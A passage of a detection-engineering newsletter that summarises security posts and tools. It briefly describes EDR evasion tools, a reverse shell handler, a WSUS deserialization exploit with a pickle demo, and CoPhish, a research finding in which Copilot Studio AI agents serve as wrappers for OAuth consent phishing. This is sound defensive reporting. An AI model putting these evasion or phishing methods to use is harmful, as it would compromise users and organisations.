It was cool seeing this update as almost a Part 2 of that post. AI-backed vulnerability discovery and submission platforms are getting much better, especially those with venture capital behind them, rather than a “researcher” running some LLM locally to find security weaknesses.


🔗 Open Source

kas-sec/version.dll-sideloading

Neat proof of concept abusing OneDrive.exe and DLL sideloading to gain execution in the OneDrive process. Once it gains execution, the malware registers exception hooks via Vectored Exception Handling (VEH). The idea is that the registered exception handler avoids being hooked by the EDR process, so execution can evade detection.


center-for-threat-informed-defense/attack-workbench-frontend

ATT&CK’s frontend application that serves as a self-hosted knowledge base for detection engineers and the ATT&CK library. With the latest v18 release, you’ll see additional resources leveraging Detection Strategies.


loosehose/SilentButDeadly

EDR killer technique that leverages the Windows Filtering Platform to prevent EDR agents from phoning home to cloud infrastructure. Super useful for preventing alerts from being sent to the cloud, but could still be noisy as an EDR evasion technique.


zopefoundation/RestrictedPython

Sandbox-like Python runtime execution environment for running untrusted code. It’s not a sandbox like a virtual machine, but it’s a subset of the Python language that restricts risky primitives in Python that can be used maliciously.
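RestrictedPython works by compiling a restricted AST and swapping in guarded builtins. A crude stdlib-only sketch of the underlying idea — a builtins whitelist handed to `exec()`, which is far weaker than what RestrictedPython actually does — looks like this:

```python
# Crude illustration of restricted execution: untrusted code only sees
# a whitelist of builtins, so it can compute but cannot reach open(),
# __import__(), etc. RestrictedPython goes much further, rewriting the
# AST to guard attribute access, iteration, and more.
SAFE_BUILTINS = {"len": len, "range": range, "sum": sum, "min": min, "max": max}

def run_untrusted(source: str) -> dict:
    env = {"__builtins__": SAFE_BUILTINS}
    exec(compile(source, "<untrusted>", "exec"), env)
    env.pop("__builtins__", None)
    return env  # names the untrusted code defined

result = run_untrusted("total = sum(range(10))")
print(result["total"])  # -> 45

try:
    run_untrusted("open('/etc/passwd')")
except NameError as e:
    print("blocked:", e)  # open() is not in the whitelist
```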


malwarekid/OnlyShell

Go-based reverse shell handler that integrates several types of reverse shells into one interface. So if you have a bash reverse shell and a PowerShell reverse shell reaching out, it will automatically detect the environment and shell type so you can select between them via its TUI-like interface.

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

DEW #135 - Chaos Detection Engineering, Connecting Policy to IR playbooks & Spooky AWS Policies

29 October 2025 at 13:03

Welcome to Issue #135 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week

  • I’m helping host the second edition of Datadog Detect tomorrow! We have an excellent lineup with folks I’ve featured several times on this newsletter. It’s fully free, fully online, and also available on-demand. We have a small capture the flag afterward to win some socks.

    • 👉 Register Here 👈 and don’t forget to meme out in the webinar chat like last time.

    • We had close to 1000 chatters so it felt like a Twitch stream

  • I’m all booked for London and got some excellent pub and restaurant recommendations. Please keep them coming :D


This Week’s Sponsor: detections.ai

Community Inspired. AI Enhanced. Better Detections.

detections.ai uses AI to transform threat intel into detection rules across any security platform. Join 9,000 detection engineers leveraging AI-powered detection engineering to stay ahead of attackers.

Our AI analyzes the latest CTI to create rules in SIGMA, SPL, YARA-L, KQL, and YARA and translates them into more languages. Community rules for PowerShell execution, lateral movement, service installations, and hundreds of threat scenarios.

Join @ detections.ai

Use invite code “DEW” to get started


💎 Detection Engineering Gem 💎

How to use chaos engineering in incident response by Kevin Low

Hey look, security steals SRE concepts again, and it’s a beautiful thing! Jokes aside, this is a concept I’ve believed in heavily since I started working professionally with SRE organizations 10+ years ago. Chaos engineering is a practice that intentionally injects faults into a production system to test resiliency and build confidence in how the system handles failure. Basically, it challenges you to break something to see how fast you can react to and recover from an outage, almost like intentionally popping a tire on your car to see how quickly you can react and change it.

This seems applicable to security, no? That’s where Low’s post comes in to test the idea. First, Low makes a gentle introduction to the concept and then presents a test architecture and a threat model in an AWS environment to experiment with.

Figure 2: Architecture after GuardDuty detects unexpected activity and the security team isolates the EC2 instance

In this scenario, a microservice experiences some unexpected security activity and GuardDuty generates an alert. If you shut down an EC2 instance, what exactly happens? Enter Chaos Engineering!

There are five steps in a Chaos Engineering experiment: defining the steady state, generating a hypothesis, running the experiment, verifying the effects, and improving the system. This has a nice carryover for testing detections and their infrastructure in production states.

  • Steady State: What is our baseline for MTTR and MTTD? What is the general uptime of our log sources? What configurations are in place to prevent attack paths?

  • Hypothesis: When a workstation queries a known malicious domain, our SIEM will detect it within 15 minutes, notify the security team within 2 minutes, and the machine will be contained 1 minute after that

  • Running the experiment: Load a benign domain into your threat intelligence lookup tables, remotely connect to a machine, and perform a DNS lookup for the benign domain.

  • Verifying the effects: Did we generate an alert in the SIEM? Was there a Slack notification to contain the host? Did it fall within our hypothesis’ parameters?

  • Improving the system: e.g., the Slack alert did not defang the domain, and the containment tooling blocked only the domain, not the resolved IP
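The five steps map naturally onto a small verification harness. A minimal sketch in Python — the Hypothesis thresholds mirror the example above, while the Observation timestamps are hypothetical stand-ins for whatever your SIEM and Slack APIs would report:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Hypothesis:
    # budgets in seconds, each relative to the previous stage
    detect_within: float = 15 * 60   # SIEM alert within 15 minutes
    notify_within: float = 2 * 60    # notification 2 minutes later
    contain_within: float = 60       # containment 1 minute after that

@dataclass
class Observation:
    injected_at: float
    detected_at: Optional[float] = None
    notified_at: Optional[float] = None
    contained_at: Optional[float] = None

def verify(obs: Observation, hyp: Hypothesis) -> dict:
    """Step 4 ('verify the effects'): check each stage against its budget."""
    def within(start, end, budget):
        return start is not None and end is not None and end - start <= budget
    return {
        "detected": within(obs.injected_at, obs.detected_at, hyp.detect_within),
        "notified": within(obs.detected_at, obs.notified_at, hyp.notify_within),
        "contained": within(obs.notified_at, obs.contained_at, hyp.contain_within),
    }

# Example run: detection after 4 minutes, notification 30s later,
# containment 45s after that -- all three stages pass
obs = Observation(injected_at=0.0, detected_at=240.0,
                  notified_at=270.0, contained_at=315.0)
print(verify(obs, Hypothesis()))
```

Any `False` in the result feeds step 5: it tells you exactly which stage of the response pipeline to improve.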

I love this approach, and I’m unsure whether any companies are considering this type of fault-injection or “adversary injection”-style testing. Breach and Attack Simulation products focus on coverage of rules, but I haven’t seen anyone think about this from a Detection & Response validation angle.


🔬 State of the Art

A Retrospective Survey of 2024/2025 Open Source Supply Chain Compromises by Filippo Valsorda

In this post, Valsorda performs a retrospective survey of all open-source supply chain attacks from 2024 to 2025. At Datadog, we collect hundreds to thousands of these malicious packages to help defend our environment, but a supply chain compromise is more than just a malicious package. The last three months alone have seen compromises that made mainstream news, such as Shai-Hulud and s1ngularity.

Valsorda grouped the root causes of 17 major attacks to help readers understand initial access and subsequent attack paths. Funnily enough, phishing was the number one root cause of these package takeovers, and number two was an attack path I haven’t been able to put into words until now: control handoff. The basic premise behind control handoffs is that they’re part social engineering and, IMHO, part insider threat. For example, the infamous xz-utils attack originated when project control was gradually handed to a contributor who eventually added a backdoor to the library. The polyfill[.]io attack involved purchasing the project’s domain, after which the new owner served malicious JavaScript to victims.

It’s a fascinating read as a survey blog, but it highlights how fragile the open-source software ecosystem is. It’s unfair how large companies and organizations demand feature and security work from some of these projects without pay, and, understandably, burnout from those demands becomes a real security issue once attackers exploit it.


Re-Writing the Playbook — A detection-driven approach to Incident Response by Regan Carey

Merging governance, risk, and compliance documents and policies across an organization is difficult. I think the most salient example of putting a policy into practice is mandatory 2FA. You write a policy that mandates 2FA, perhaps based on a SOC 2 or ISO 27001 audit, and your IT team buys physical YubiKeys and configures Google Workspace to ensure that all authentication requires a hardware key.

This gets harder and more nebulous in the threat detection space. 2FA is clean and measurable; you can pull reports of the number of employees enrolled in 2FA and drive it to completion. But, how do you drive a Ransomware Response Playbook into completion? Is it that you have a playbook? Is it that you have EDR tooling, plus a playbook? Or is it that you have a playbook, you have EDR tooling, and you have Bob from IT who presses a button when an EDR fires?

But what about individual rules that respond to ransomware? Are they firing accurately? Is the SPECIFIC response playbook inside the rule up to date? When do you know it's out of compliance with the overall playbook? I think the answer is: you don’t and you won’t. This is where Carey begins their exercise and proposes their Incident Response Diamond concept.

Translation and mutation of data can result in loss of specificity, which is no different from a data engineering pipeline problem. Data engineering solves this through meticulous field mapping and clear documentation, and I think that is what Carey’s Diamond concept proposes here. Basically, they define a handoff from non-technical playbooks into rules, but keep a lineage of how specific playbooks are invoked by rules, so you know which policy each rule falls under.

I think this is a great approach, but it means your security response and GRC teams need lots of alignment to pull it off. Documentation is one of the hardest parts of security, and keeping rules up to date is already hard enough.


Fantastic AWS Policies and Where to Find Them by David Kerber

The hardest thing in Computer Science is cache invalidation. The second hardest thing in Computer Science is naming things. For security, I think the hardest thing is understanding cloud identity models. The second hardest thing is also naming things.

One of the best ways in AWS to reduce the blast radius of attacks, or prevent attacks altogether, is to leverage the myriad of AWS policies that they make available to customers. But a word of caution from Kerber: the amount of tools you have at your disposal here can also be your downfall. In fact, as Chester Le Bron puts it:

You now need to become an SME in the operating system called AWS and its core services, some of which (like IAM) could be considered their own OS due to their complexity

So, in this post, Kerber outlines every type of AWS policy that helps manage access. There are several types: some let you Allow or Deny access, while others only Deny, and you can apply them across Users, Resources, Service Accounts, and even GitHub Actions.
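As a tiny example of the Deny-only flavor, a service control policy that keeps anyone in the account from tampering with CloudTrail might look like this (illustrative, not taken from Kerber’s post):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyCloudTrailTampering",
      "Effect": "Deny",
      "Action": [
        "cloudtrail:StopLogging",
        "cloudtrail:DeleteTrail",
        "cloudtrail:UpdateTrail"
      ],
      "Resource": "*"
    }
  ]
}
```

SCPs filter what identity policies may grant, and an explicit Deny like this wins regardless of any IAM permissions attached to a principal.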

Luckily, each section is split up so folks can use this blog as a reference post to come back to. They also open-sourced a tool called iam-collect to help retrieve all of these policies locally for analysis. I’ll list the tool in the Open Source section at the bottom of this week’s issue!


Introducing CheckMate for Auth0: A New Auth0 Security Tool by Shiven Ramji

CheckMate is a free Auth0 tenant configuration tool that operates as a CSPM for Auth0 deployments. It ships checks for all kinds of misconfigurations in an Auth0 environment, and you can run them on an interval to detect drift and fix it before it becomes a problem. One of the cool parts here, and the least CSPM-y from a pure security product perspective, is the extensibility runtime checks: it runs several checks against custom Auth0 runners to find everything from hardcoded passwords to vulnerable npm packages.


☣️ Threat Landscape

UN Convention against Cybercrime opens for signature in Hanoi, Viet Nam by United Nations Office on Drugs and Crime

The United Nations hosted its “Convention against Cybercrime” signing in Hanoi, Vietnam last week. Besides sounding like a sick conference (I hope someone wore a hacker hoodie), 72 countries signed an international treaty that provides guidance and guardrails for nations battling international cybercrime. The post has some interesting highlights from the treaty, including standards for electronic evidence collection and easier data sharing, and it recognizes the dissemination of non-consensual sexual images as an offense.


Lessons from the BlackBasta Ransomware Attack on Capita by Will Thomas

Cyber threat intelligence G.O.A.T. Will Thomas dissected the 136-page ICO report on Capita Group’s breach by BlackBasta in 2023 for some juicy intelligence and lessons learned. The cool part of this is that Will found messages from the BlackBasta chat leak that line up with the timeline published in the ICO report.

It’s nice to get commentary from a CTI expert on publicly facing penalty notices and disclosures. Lessons learned are great at a high level, but digging into exact TTPs from BlackBasta and comparing them to the material failures within the security program at Capita are way more useful to the rest of the security community.


CVE-2025-59287 WSUS Unauthenticated RCE by Batuhan Er

This week, Microsoft released an out-of-band security update for its Windows Server Update Services (WSUS) product. WSUS lets administrators manage the installation of Windows updates across their fleet. The deserialization vulnerability results in remote code execution, so Microsoft scored CVE-2025-59287 a 9.8.

In this vulnerability walkthrough, Er follows the vulnerable code path and ends with a PoC to exploit the vulnerability. The discovery here is that WSUS deserializes encrypted XML objects unsafely in the GetCookie() endpoint. You can send over any arbitrary object (or a specially crafted one) to get RCE.
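The .NET specifics aside, the bug class translates to any language whose deserializer will reconstruct arbitrary objects. A Python analogy using pickle (the payload just appends to a list instead of running a command, but something like `os.system` would slot in the same way):

```python
import pickle

executed = []

def record(msg):
    # benign stand-in for os.system or similar
    executed.append(msg)
    return msg

class Payload:
    def __reduce__(self):
        # tells pickle: on load, call record("attacker code ran")
        return (record, ("attacker code ran",))

blob = pickle.dumps(Payload())  # what an attacker would send over the wire
pickle.loads(blob)              # the vulnerable deserialization step
print(executed)                 # -> ['attacker code ran']
```

Deserializing attacker-controlled bytes with a formatter that can invoke arbitrary callables is the whole vulnerability; no memory corruption required.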


Exploitation of Windows Server Update Services Remote Code Execution Vulnerability (CVE-2025-59287) by Chad Hudson, James Maclachlan, Jai Minton, John Hammond and Lindsey O’Donnell-Welch

As a follow-up post to Er’s above, the Huntress team found in-the-wild exploitation of CVE-2025-59287. A handful of their customers had Internet-exposed WSUS servers. When the vulnerability details and subsequent PoCs dropped, attackers leveraged the exploit against exposed servers. Most of the activity looked like initial reconnaissance, but this post goes to show how fast you have to react to emerging vulnerabilities, especially when you have misconfigurations that could have prevented exploitation.

The team also dropped a Sigma rule and IoCs for readers to hunt on.


Hugging Face and VirusTotal: Building Trust in AI Models by Bernardo Quintero

This is a small product update covering VirusTotal’s integration into Hugging Face’s registry of AI models. I usually don’t post product updates, but both VirusTotal and Hugging Face are community-driven products, and it’s nice to see the VirusTotal team commit to helping developers identify malicious models hosted on Hugging Face.


🔗 Open Source

auth0/auth0-checkmate

GitHub link for the CheckMate project open-sourced by the Auth0 team. You can see all of their checks in code, and it looks like it operates similarly to Prowler.


cloud-copilot/iam-collect

Kerber’s iam-collect repo from the story I linked in State of the Art above. Give it access to your AWS environment and it’ll rip through the IAM policies and download them to disk. It links to a separate GitHub project called iam-lens to help simulate and evaluate effective permissions.


EmergingThreats/pdf_object_hashing

PDF object hashing is a technique similar to imphash, where you compare the structure of PDF documents without focusing on the content inside. imphash is helpful for identifying similar binary features and symbols so you can cluster malware samples and find new ones. This follows the same philosophy, letting you cluster malicious PDF documents using similar techniques.
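The concept is easy to sketch: walk the objects in order, keep only each object’s /Type tag, and hash the sequence. A toy illustration (my own, not the EmergingThreats implementation, which is far more robust):

```python
import hashlib
import re

def pdf_object_hash(pdf_bytes: bytes) -> str:
    """Hash the *structure* of a PDF: the ordered sequence of object
    /Type tags, ignoring the content inside each object."""
    # Find every 'N 0 obj ... endobj' body, in file order
    objects = re.findall(rb"\d+\s+\d+\s+obj(.*?)endobj", pdf_bytes, re.S)
    types = []
    for body in objects:
        m = re.search(rb"/Type\s*/(\w+)", body)
        types.append(m.group(1) if m else b"Unknown")
    return hashlib.md5(b"|".join(types)).hexdigest()

# Two documents with identical object layout hash the same even though
# their stream contents differ -- that's the clustering property
doc_a = b"1 0 obj<</Type/Catalog>>endobj 2 0 obj<</Type/Page>>stream AAA endstream endobj"
doc_b = b"1 0 obj<</Type/Catalog>>endobj 2 0 obj<</Type/Page>>stream BBB endstream endobj"
print(pdf_object_hash(doc_a) == pdf_object_hash(doc_b))  # -> True
```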


chainguard-dev/malcontent

I’ve been following Chainguard’s malcontent project for a while and it looks like they’ve been throwing a lot of development at it. It’s a supply-chain compromise detection system that uses a butt-ton (yes, a butt ton) of analysis techniques, including close to 15,000 YARA detections, to help detect these compromises before they make it into your build and production systems.


ForensicArtifacts/artifacts

Machine-readable knowledge base of forensic artifact information. It has a good number of YAML files that store metadata about specific sources and the files and directory paths you can use during forensic analysis.
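Each artifact is a small YAML document; a representative (abridged) definition for cron files might look roughly like this — adapted from memory of the repo’s schema, not copied verbatim:

```yaml
name: LinuxCronFiles
doc: Linux cron job files and spool directories.
sources:
- type: FILE
  attributes:
    paths:
    - '/etc/crontab'
    - '/etc/cron.d/*'
    - '/var/spool/cron/**'
supported_os: [Linux]
```

Because the definitions are machine-readable, collection tools can consume them directly instead of hardcoding artifact paths.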

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

DEW #134 - Prioritizing Critical Assets, AI SOC means MORE alerts and Microsoft CoPilot Phishing

22 October 2025 at 14:03

Welcome to Issue #134 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week


  • I popped and tore muscle/cartilage in my ribs on Friday. Urgent care sent me to the ER, and the ER laughed at me and said I’m too young to hurt my ribs and come to the hospital, so they sent me home D:

  • I’m booking a (small) solo trip to London in December. Who’s got restaurant and, more importantly, pub recommendations in the Soho area? Shoot me a message and I’ll buy you a (virtual or not) pint!

  • I get some AMAZING content sent to me in all kinds of mediums, but it’s hard for me to keep track. So, I made a submissions form @ https://submit.detectionengineering.net that sends your blog details straight to my Notion. If you are writing something, I want to know!

This Week’s Sponsor: detections.ai



💎 Detection Engineering Gem 💎

Critical Asset Analysis for Detection Engineering by Gary Katz

If everything is Priority, nothing is Priority

I think about this mantra when I am looking at team planning for our security org at $DAYJOB. Security has a thankless job in many ways: when things go wrong, we are both in the spotlight and under a microscope. When things go well, we may seem invisible to others. This means scrutiny comes at the worst times, such as during an emergency, and the amount of planning and prioritization you do beforehand can really showcase how mature you are as a security program.

Lots of detection blogs I read talk about sending telemetry into a SIEM or log store and running detection logic over that telemetry. These blogs carry a large assumption: that every piece of telemetry is created and maintained equally. In the real world of business, this is the furthest thing from the truth. Compare a workstation going offline to a domain controller going offline: the latter is what Gary calls a “chokepoint.”

These chokepoints are assets that become the biggest target for adversaries, and labeling them as Critical Assets provides clarity to your security team and your leadership team that you are putting focus in the right spots. The Critical Asset approach here requires conversations up and down your reporting chain, but it should render insights into what a detection team should prioritize first:

I love this approach because it shifts the conversation away from 100% MITRE coverage across everything to focused and directed coverage on your organization’s most critical services and assets. According to Katz, this methodology should output a prioritized list of assets, relevant attack paths, and coverage metrics that you can provide to others in your organization to showcase the value in peacetime (not during an incident).

The only part of this approach that I struggle with, not specifically with Katz’s but in general, is that it’s hard to highlight coverage on assets as the list grows.


🔬 State of the Art

How AI Transforms Detection Engineering by Filip Stojkovski

Like most things in security, detection engineering is a capacity problem. Every security operations function has three knobs to dial to scale their org, and each comes at a cost: people, process, and technology. SOCs address the need for scale through people, but that doesn’t scale linearly, because triaging more alerts requires proportionally more people. This is where process and technology help scale the function, especially if you have a solid engineering foundation and a healthy department culture that constantly updates processes.

One of a detection engineer’s most potent knobs is tuning how much or how little threat activity and benign traffic you capture. According to Stojkovski, this knob has always leaned toward precision (what we capture is relevant), because we don’t want to overwhelm the capacity of triage analysts. But does this change with the advent of AI SOC technology?

Stojkovski argues it does, and I have to agree. LLMs let us turn the “technology knob” way, way up, which means we gain a scale advantage that isn’t pinned to the linear growth of humans. I also really like their nuance that the focus of this tech should be on true-positive benigns and false positives, so analysts spend their time on real incidents rather than on alerts that eat 10-15 minutes each.


CoPhish: Using Microsoft Copilot Studio as a wrapper for OAuth phishing by Katie Knowles

~ Note, Katie works at Datadog and is my colleague ~

AI-based features introduce risks we’ve never seen before, and it’s easy to see why the hype matters. Prompt injections lead to some funny outcomes, but the more overlooked part of AI implementation is tried-and-true vulnerabilities. Developer teams are being pushed to ship features so they aren’t last to market, and misconfigurations and non-standard development workflows creep into production, leaving users and organizations alike vulnerable.

This is the case with Katie’s latest research into Microsoft’s Copilot Studio, Microsoft’s workbench product for developers who want to create AI chatbots. According to Katie, it has some confusing UI/UX workflows for authenticating to a chatbot, as well as poor permission structures, which together allow attackers to create OAuth consent phishing attacks.

An attacker can use a malicious Copilot Studio agent to trick a target into an OAuth phishing attack. The attacker or agent can then take actions on the user's behalf.

Desired State Configurations by smash_title

This is the first time I’ve heard of Microsoft’s infrastructure-as-code and configuration management policy language, Desired State Configurations (DSC). So, this was a helpful post for me to understand Microsoft’s approach to DevOps using native tooling from the hyperscaler. smash_title came across this technology set while creating a detection engineering-style lab for Azure Virtual Machine Windows and Linux detection testing.

It does look similar to the likes of Terraform and Ansible depending on which of the three versions you are using. There are some neat features that I don’t think I’ve seen in other similar technologies, such as drift detection and correction, and workstation resource management. It looks like Microsoft is sunsetting the earliest version that relies on PowerShell, and wants to move to a pure JSON/YAML-style declarative format, but they seem to be pretty far away from feature completeness on the newer versions.


Introducing HoneyBee: How We Automate Honeypot Deployment for Threat Research by Yaara Shriki

HoneyBee is an open-source toolset that automates the creation of honeypot stacks leveraging LLMs. Unlike other honeypots that put LLMs inside the web-app to mimic an environment, this one focuses on the configuration management and infrastructure component, which I think is a much more fruitful approach for detection engineers.

You provide access to your favorite foundational model, select a technology stack, and select one or many misconfigurations in the Wiz catalog, and it generates docker-compose files for use. This is helpful when you are building detections for specific stacks and want to see how telemetry is generated after a misconfiguration is exploited. Alternatively, you can deploy this on a honeypot listening on the Internet to collect indicators of compromise.


From Logs to Leads: A Practical Cyber Investigation of the Brutus Sherlock by Adam Goss

This is an in-depth walkthrough of the forensics challenge “Brutus” on hackthebox. I like Goss’s approach of splitting the investigation into four distinct skillsets: interpretation, collection, capability comprehension, and manipulation. Each one of these skills involves understanding a target system’s technology stack, gathering necessary data from various sources, and then using the tooling you have at your disposal to interpret the timeline of events.


☣️ Threat Landscape

[RESOLVED] Increased Error Rates and Latencies by Amazon Web Services

dns haiku

What a crazy turn of events: a cascading DNS failure starting in AWS DynamoDB, which then affected an internal service supporting launching EC2 instances, which then messed up health checks on load balancers and spread through 142 separate services.


To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER by Wesley Shields

This GTIG blog is a great example of how threat actors can rapidly adjust their malware development as they deploy it. Shields profiles COLDRIVER (aka Star Blizzard)’s new malware delivery chain. It uses phishing as the initial lure, which leads to a ClickFix infection. During the infection, COLDRIVER leveraged a clunky Python-based backdoor, then began simplifying the malware away from Python and focusing on PowerShell. It looks like COLDRIVER abandoned Python because it required a Python runtime on the victim machine, whereas PowerShell is native functionality across their victim set.


Email Bombs Exploit Lax Authentication in Zendesk by Brian Krebs

Threat actors bombarded the customers of large Zendesk customers last week using flaws in how Zendesk portals are configured. The misconfiguration allows anyone with access to a company’s Zendesk portal to send ticket-creation notifications that come from the company’s domain. Most of these were spam and troll-style messages, some even accusing Krebs of breaking the law.

But it goes to show how SaaS apps have multiple layers of configuration and can lend themselves to abuse scenarios like this if someone looks hard enough.


Revelations on Group 78, the secret US task force that fights cybercriminals by Martin Untersinger and Florian Reynaud

I was skeptical reading this headline because I’ve been burned by mysterious marketing-style blog posts, but then I realized it was an exposé from Le Monde. Untersinger and Reynaud provided readers with some extraordinary background on the alleged FBI Ransomware Disruption Taskforce, Group 78. The goal of the group is to perform ransomware disruption operations, up to and including arrests of suspected ransomware operators. They leverage a variety of legal and more modern tactics, such as exposing criminals' identities.

The hope is to pull all the levers they can find to degrade the trust between ransomware groups, and to be honest, I like this approach. For example, Untersinger and Reynaud assert that the ExploitWhisperer leak of over 200,000 BlackBasta Telegram messages may have been from Group 78.


🔗 Open Source

smashtitle/DesiredStateConfigurations

smashtitle’s GitHub repository for the DesiredStateConfigurations research I posted above in the State of the Art section. The cool part is that it’s a single PowerShell script that sets up a lab environment tailored for detection engineering on Windows. It strips out a lot of the B.S. out-of-the-box services and applications that would otherwise generate noise for people running the lab.


yaaras/honeybee

Repository from Shriki’s research on building honeypots using LLMs. They have a neat misconfiguration index that you can drop into your prompt for specific technologies, so that you not only build the honeypot but also intentionally misconfigure it for detection rule coverage and lure the bad guys into exploiting it.


dobin/DetonatorAgent

Detonation platform for malware development and telemetry collection. The initial idea was to develop malware and test it against Windows via the DetonatorAgent virtual machine. It can collect telemetry from the environment as well as from the EDR.


google/osdfir-infrastructure

Helm Charts for various open source DFIR infrastructure built at Google. You can run something like minikube locally to take advantage of this, or deploy it on managed Kubernetes on AWS or GCP.


DEW #133 - Redefining Security Visibility, TTP-First Hunting & F5 breach

16 October 2025 at 14:03

Welcome to Issue #133 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week:

  • I did a family road trip for the long weekend to my hometown. I’m happy to report to other parents that I’ve had my first experience of a kid throwing up in the backseat. Do I earn a badge of honor here?

  • Datadog Detect is BACK for round 2, so please sign up and see some excellent Detection Engineering talks! It’s free, fully remote, and there will be activities (yay!) and labs for conference goers.




💎 Detection Engineering Gem 💎

What Does “Visibility” Actually Mean When it comes to Cybersecurity? by David Burkett

The most frequent question I get from my boss at Datadog is “Are we covered?” It’s a simple question, but it’s extremely hard to answer. What does covered mean? Are we covered now, before, or in the future? Do you mean MITRE rule mappings, operational maturity, incident readiness, or threat intelligence awareness? It turns out that agreeing on a singular definition of anything in security is difficult!

It was nice to read Burkett’s post here discussing the varying definitions of visibility. Like most industry standards, several companies and organizations have attempted to define visibility, but no single standard or definition has emerged as the true winner. David adapted Splunk’s blog on observability into the security operations space, and I think it works beautifully:

  • Visibility is the holistic state wherein a system generates telemetry, is subject to robust monitoring for known conditions, and possesses observability, enabling deep, exploratory analysis to diagnose novel problems. Full visibility is achieved only when these three elements are cohesively integrated, allowing operators to move fluidly from detecting a known issue (monitoring) to exploring its unknown root cause (observability), all supported by a common foundation of high-quality data (telemetry).

He then fits this mental model into a three-tiered definition based on who is asking about visibility. The three tiers look like they are inspired by the tiered types of threat intelligence: strategic, operational and tactical. This is also a great approach because visibility means something different depending on the customer you are talking to.

Senior leaders typically care about the full visibility of the business, not necessarily the individual elements along the ATT&CK chain. When you get to operational, you focus on the attack surface, such as endpoint, network, and SaaS. Each one of these attack surfaces can have many telemetry sources, think EDR and Secure Web Gateway for domain visibility. Lastly, he rounds out tactical visibility by examining specific telemetry sources, like EDR, and moving through MITRE ATT&CK to assess visibility in each stage.

All models are wrong; some are useful. This may not be “perfect” in terms of defining visibility, but in my opinion, it’s a good mental model. It pulls inspiration from SRE concepts like observability and fits that into the context of a security program’s healthiness based on the customer who is asking.


🔬 State of the Art

Hunting Beyond Indicators by Sam Hanson

Threat Hunting is the art of managing false positives. The basic idea is that you flip the premise of triage: both detection engineering and hunting cast a wide net in their queries to find needles in a haystack, but in the former, you want as little hay as possible. Maybe I can keep this imagery going and talk about separating wheat from chaff?

Alright, alright, enough farming analogies. I included this post because it shows the tradeoffs of hunting when starting with threat intelligence indicators versus adversary TTPs. When you plan and execute a threat hunt, the expectation is to find many results and have time to sift through them, using down-selection techniques to determine if there is an intrusion. The order of down-selection matters, though. According to Hanson, you want to start with tactics and techniques first (which I agree with), and then filter by other components like threat intelligence indicators.

If you start with threat intelligence indicators, you introduce a selection bias because they are brittle selectors and, by nature, won’t catch unknown IOCs. Focus on TTPs first, down-select to find unknown IOCs, and feel free to use IOCs after for additional enrichment.
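To make the ordering concrete, here is a minimal Python sketch of TTP-first down-selection. The event records, field names, and indicator values are all invented for illustration; a real hunt would run the equivalent filters in your SIEM's query language.

```python
# Hypothetical events; field names and values are invented for illustration.
events = [
    {"host": "web-1", "cmdline": "certutil -urlcache -f http://10.9.9.9/a.exe", "dst_ip": "10.9.9.9"},
    {"host": "db-2",  "cmdline": "certutil -dump cert.cer",                     "dst_ip": "10.0.0.5"},
    {"host": "web-3", "cmdline": "powershell -enc aQBlAHgA",                    "dst_ip": "203.0.113.7"},
]

known_bad_ips = {"10.9.9.9"}  # brittle CTI indicators

# 1) Down-select on behavior (TTP) first: ingress tool transfer via certutil.
behavioral = [
    e for e in events
    if "certutil" in e["cmdline"] and "-urlcache" in e["cmdline"]
]

# 2) Apply IOCs afterwards, as enrichment rather than the initial filter, so
#    behaviorally suspicious events with unknown infrastructure still surface.
for e in behavioral:
    e["known_ioc"] = e["dst_ip"] in known_bad_ips
```

Reversing steps 1 and 2 would silently drop the same certutil activity whenever the destination IP isn't already in your feed, which is exactly the selection bias Hanson warns about.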


Intuition-Driven Offensive Security by Andy Grant

When I first started working in security, becoming a red-teamer or a pentester felt like a class of jobs reserved only for the most technical experts in the field. There’s something beautiful in deconstructing assumptions of systems, building tools to probe those assumptions for weaknesses, and then exploiting those assumptions to achieve that objective. At the time, I was only aware of jobs at consulting firms that had intense interview processes, so I never felt I could make it.

As I progressed in my career, I started to meet and work with red teams. They typically fit into a mold where they engage and produce a report. As a blue teamer, it was hard for me to understand the value of a report when the engagement with that same team stopped after the delivery. I suspect many companies feel the same after engaging a pentesting firm: the hard work starts with the findings, not the engagement.

Grant visits this concept and provides a better working model for red teamers that he dubs intuition-driven security. The three principles he lays out focus on understanding the risk behind an implementation rather than hunting and reporting bugs. IMHO, this is a much sounder approach because it forces red teamers to think like security engineers rather than pentesters. If the outcome is risk reduction, the incentive structure rewards knowledge of the engineering behind a service. This knowledge drives empathy for the problems the service solves and serves as a forcing function for closing the security gaps the team finds during an engagement.


Practical Resources for Detection Engineers. || Starters 🕵🏻 and Pro || by Goodness Adediran

I love reading “Introduction to Detection Engineering” posts because you get a good diversity of thought around how to break into the field. Some folks focus on the expertise required to break in, but keep it vague enough that it’s easy to retrofit into your life situation. Others look at more tactical details, like technologies to learn, such as SIEMs or languages. Adediran took an approach that I first saw from Katie Nickels in her series on self-studying for Threat Intelligence.

This post provides a self-study roadmap for readers who want to break into detection engineering. Adediran splits this up into foundational blogs on the subject, studying MITRE to get a better understanding of how it maps to rules, and then crescendos out to specialist subjects across several mediums like blogs, videos, books, open-source repositories and podcast episodes.


Purple Team Maturity Model: From Chaos to Controlled Chaos by Silas Potter

I’m a big fan of maturity models, because they set a clear direction and roadmap for a program or function, but leave enough wiggle room to add, remove, or change milestones to fit your business context. In my professional experience, they’ve helped me set a tone for reporting maturity to leadership and provide an excellent north star for folks reporting into my org. So, when a new “maturity” model pops up in my feed, I almost always read it and steal ideas to use for my own purposes :).

Purple Teaming is an excellent way to improve the operational robustness of your detection program, so I was pleased to see Potter’s approach here to quantify how to achieve a well-oiled purple teaming function. Notice that this isn’t about a specific team doing purple teaming; instead, it’s a program across multiple teams, the obvious one being the joining of red and blue teams. I like this approach because it helps unite two teams who may not be talking to each other and showcases the value of both functions by driving detection outcomes rather than churning out rules or red team reports.


☣️ Threat Landscape

K000154696: F5 Security Incident by F5

